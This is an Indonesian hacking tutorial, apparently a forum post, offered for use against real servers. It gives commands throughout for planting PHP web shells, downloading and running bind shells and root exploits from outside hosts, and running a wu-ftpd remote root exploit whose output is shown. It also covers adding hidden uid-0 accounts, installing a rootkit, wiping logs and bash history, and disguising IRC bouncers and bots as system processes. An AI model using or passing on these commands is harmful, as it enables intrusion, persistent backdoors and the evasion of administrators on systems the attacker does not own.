-*-------------------*- -*- pasang backd00R -*- -*-------------------*- ===================== install shell php ===================== ###contohnya http://livron.port5.com/mail.php <---------ini source shell misalnya: http://www.moonshade.com/modules/My_...5.com/mail.php -O log.php bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita kalo bisa... buka: http://www.target.org/modules/My_eGa...public/log.php ============== pasang bindtty ============== ###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000 diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port 4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com. myshell~>gcc -o phnxscan phnxscan.c myshell~> ping -c 2 target.com PING target.com (210.189.77.28): 56 data bytes 64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms 64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms --- target.com ping statistics --- 2 packets transmitted, 2 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms myshell~> phnxscan -p 4000 -s 210.189.77.28 port 4000 (tcp) terbuka Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan password yang default dari scriptnya changeme myshell~> telnet 210.189.77.28 4000 Trying 210.189.77.28... Connected to target.com (210.189.77.28). Escape character is '^]'. --------------------------------------------------- #### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd baru bikin file exekusi chmod 755 /tmp/httpd ---------------------------------------------------- #### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty cd /var/tmp ; chmod 755 bindtty cd /var/tmp ; ./bindtty ---------------------------------------------------- # test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa wget http://roseofworld.org/shell.tar tar -zxvf shell.tar; cd webshell; ./1980 # klo uda buka putty > masukkan host > pilih telnet > isi port: 1980 # klo sukses maka akan masuk shell ### pake bind yg laen jika pengen shellnya ada passwd-nya cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap # telnet ke host port 6665 passwd `stimik` ## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty telnet ke host port 6665 passwd `gagal` ## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php # chmod 755 dns; ./dns # telnet www.target.com 6029 -*-------------------*- -*- belajar NgeRoot -*- -*-------------------*- ### tahap ngeroot di shell yg tadi kita tembus mkdir /tmp/temp.log cd /tmp/temp.log wget http://roseofworld.org/root.tar.gz tar -zxvf root.tar.gz cd root ./loginx 1970 1970 # jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi # # cek dengan `id` jika root jgn lupa bagi2 shellnya :p ### atau bisa ambil exploit di www.malanghack.net/alat/ mkdir /tmp/temp.log;cd /tmp/temp.log wget http://www.malanghack.net/alat/w00t chmod 755 w00t ./w00t # jika ga muncul pesan error: you got root man!! +----------------------------------------------------------------------------------------+ -*-----------------*- -*- Cracking Root -*- -*-----------------*- Tips: mkdir .bash <--- untuk membuat direktori bash cd .bash <--- untuk masuk ke direktori bash mkdir <direktory> <--- untuk membuat direktory baru cd <direktory> <--- untuk masuk ke direktory yg anda mau cd / <--- untuk keluar dari suatu direktory rm -rf <file> <--- untuk menghapus file/direktory -*-----------------------------------------------*- 1. Tahap Pertama : Cara instalasi Xpost dan ftp wget http://cyberborneo.b0x.com/xpost.tgz wget http://cyberborneo.b0x.com/ftp.tgz tar -zxvf xpost.tgz tar -zxvf ftp.tgz -*------*- 2. Tahap Kedua cd xpost cd xwurm/ ./scan 213.124 setelah dapat wu-scan.log ./masswu wu-scan.log Setelah didapat pesan sebagai berikut Trying get root 213.124.151.113 ... SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ... Logged in log-root ... Itu berarti anda telah dapat akses root di IP 213.124.151.113 -*------*- 3. Tahap Ketiga Buka new sessiom dari putty ssh anda, login kembali ke shell anda masuk ke direktory ftp anda cd ftp ./awu 213.124.151.113 ( ip nya) apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb: 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). # trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected. # banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready. # successfully selected target from banner ### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] # 1. filling memory gaps # 2. sending bigbuf + fakechunk building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes # 3. triggering free(globlist[1]) # # exploitation succeeded. sending real shellcode # sending setreuid/chroot/execve shellcode # spawning shell ################################################################### uid=0(root) gid=0(root) groups=50(ftp) Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown whoami root <-- berarti anda sedang dalam akses root -*------*- 4. Tahap Keempat Add login akses root anda ---------------------------------------------------------------- 1. Cara I (bukan utk redhat 7.2) /usr/sbin/useradd rampok -u 0 -d / passwd -d rampok passwd rampok su rampok <<--------untuk super user 2. Cara II kalo mau dapet acces root ketik : /usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit abis itu ketik lagi passwd crit wuasu666 Kemudian Add User untuk login shell anda /usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html passwd html ####666 2X -*------*- 5. Tahap Kelima Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan wget www.utay-doyan.cc/shv4.tar.gz tar -zxvf shv4.tar.gz cd shv4 ./setup pass yang dimau port yang dimau contoh : --> ./setup wuasu 7000 cd / wget http://cyberborneo.b0x.com/cleaner.tgz tar -zxvf cleaner.tgz cd cleaner ./install Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak rm -rf cleaner.tgz rm -rf shv4.tar.gz -*------*- 6. Tahap Keenam Hapus jejak ngeroot anda ketik perintah berikut: rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /devory ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages rm -rf /var/log/lastlog cat > /var/log/lastlog ctrl d SELESAI..... --------------------------------------------------------------------------------- -*-----------------*- -*- all IN one -*- -*-----------------*- Trik membuat PsyBnc, Menghapus file Log, membuat BACK DOOR , ..... << lengkapnya >> --------------------------------------------------------------------------------- -*------------------------------------------*- -*- Langkah2 membuat PsyBnc Yang aman :P~ --*- -*------------------------------------------*- mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk ke direktori tersebut cd "...." <<-- masuk ke direktori wget wget http://www.psychoid.lam3rz.de/psyBNC...-static.tar.gz mv psyBNC2.2.1-linux-i86-static.tar.gz .sh tar -zxvf .sh mv psybnc .log cd .log make echo "PSYBNC.SYSTEM.PORT1=110" >> user.conf echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf pwd /home/scut/..../.log ketik command: PATH=$PATH:/home/scut/"...."/.log mv psybnc "[identd] " mv scut.conf " " "[identd] " " " .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-. ,----.,----.,-. ,-.,---.,--. ,-.,----. | O || ,-' \ \/ / | o || \| || ,--' | _/ _\ \ \ / | o< | |\ || |__ |_| |____/ |__| |___||_| \_| \___| Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' Configuration File: No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 11111 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291) [scut@d11303 .log]$ ps -x untuk mengetahui proses di background shell [scut@d11303 .log]$ ps -x PID TTY STAT TIME COMMAND 31544 ? S 0:16 ./bash 31629 ? S 0:06 sendmail to scut 2212 pts/1 S 0:00 -bash 2291 pts/1 S 0:00 [identd] 2309 pts/1 R 0:00 ps -x catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background psybnc anda yang berubah setelah kita lakukan trik tersebut namun jangan keburu gembira dahulu, karena mungkin admin curiga dengan background yang ada di server tersebut dan admin akan mencarinya dengan: find | grep psybnc <<-- kemungkinan yang dilakukan karena biasanya admin tahu kalau user selalu run psybnc maka akan nampak nama nama psybnc anda ./log/psybnc.log ./log/psybnc.log.old ./psybncchk ./psybnc.pid Untuk itu kita perlu mengganti nama nama tersebut dengan yang lain semisal [scut@d11303 .log]$ mv psybnc.pid .log [scut@d11303 log]$ mv psybnc.log .sh [scut@d11303 log]$ mv psybnc.log.old .mud Dengan cara tersebut kemungkinan sang admin nggak akan curiga terhadap background yang ada di server anda ;) dan yang terakhir jangan lupa bersihkan log anda dengan mengetik command: rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /.bash_history ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages Atau bisa juga menggunakan remove.c yang ada di situs k-elektronik :) selamat mencoba -*------------------------------------------*- -*- Langkah2 membuat PsyBnc II --*- -*------------------------------------------*- wget http://www.geocities.com/g4ptek/tools/psy.tar.gz tar -zxvf psy.tar.gz rm -rf psy.tar.gz cd .cgi; ./config 21221;-----------> port ubah sesuai keinginan ./####;./run .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-. ,----.,----.,-. ,-.,---.,--. ,-.,----. | O || ,-' \ \/ / | o || \| || ,--' | _/ _\ \ \ / | o< | |\ || |__ |_| |____/ |__| |___||_| \_| \___| Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-' Configuration File:ssstt No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 21221 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291) # usage: # buka mirc, setting identd bebas, nick bebas ketik /server www.target.com 21221 -*------------------------------------------*- -*- Langkah2 membuat PsyBnc II Freebsd --*- -*------------------------------------------*- # wget http://www.geocities.com/g4ptek/tools/bnc.tar.gz # tar -zxvf bnc.tar.gz # rm -rf bnc.tar.gz # cd .ls # chmod 755 ls # ./ls -*-----------------------------------*- -*- Cara Mudah Untuk membuat BOT I -*- -*-----------------------------------*- NB: BOT Ini akan otomatis jalan pada server dalnet " Husus Untuk dalnet server " 1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <--untuk tambahan creat.tcl 2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2 3. cd .kin 4. ./creat fileconf nick ident IP channel owner contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya) s4nd4l_j3p1t ...............nick bot s4nd4l ...................ident bot 212.88.174.3 .......IP shell <bisa dilihat dengan menggunakan command /sbin/ifconfig atau cat /etc/hosts defaced ..................... nama channel, jangan pake # g4ptek ................ nick owner catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash) contoh: mich`keren -> mich\`keren 5. ./eggdrop -m fileconf atau ./run fileconf fakename fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya) Udah deh! tunggu aja di channel, ato whois aja nicknya. Bila ingin tambahkan tcl lain seperti creat.tcl <khusus pada kinabot.tar.bz2>: 2. ./tcl -t fileconf creat.tcl contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl ) untuk penggunaan bisa diliat dengan command/perintah !creat dichannel -*-----------------------------------*- -*- Cara Mudah Untuk membuat BOT II -*- -*-----------------------------------*- wget http://geocities.com/g4ptek/tools/bot.tar.gz tar -zxvf bot.tar.gz rm -rf bot.tar.gz cd .share # download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi # contoh: http://verzekering.it/voorwaarden/.c...ripts/bot4.txt # klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/ # klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi ./shade "httpd" ./eggdrop -m bot.txt # usage: # pv bot kamu di channel # /msg nick-bot-kamu auth <passwd> # /msg nick-bot-kamu pass <passwd> # /msg nick-bot-kamu auth <passwd> COPY PASTE Http://www.jasakom.com
Tags:
Hacking Dan Cracking